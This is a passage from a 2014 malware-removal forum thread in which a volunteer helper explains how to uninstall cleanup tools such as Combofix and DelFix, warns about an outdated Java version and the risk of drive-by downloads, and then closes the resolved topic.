Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restorepoints:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe in Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden. So don't add a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this malware exploits security holes in installed software (e.g. browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Java™ 6 Update 35




Tips

I recommend to read and follow the "16 simple and easy ways to keep your computer safe and secure on the Internet" (Link) by Lawrence Abrams.

#11 morris79

morris79
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:10:46 AM

Posted 12 September 2014 - 09:47 AM

Thanks Much!!!!!



#12 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:46 PM

Posted 12 September 2014 - 10:41 AM

You're welcome.
Take care.

#13 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:46 PM

Posted 12 September 2014 - 10:42 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users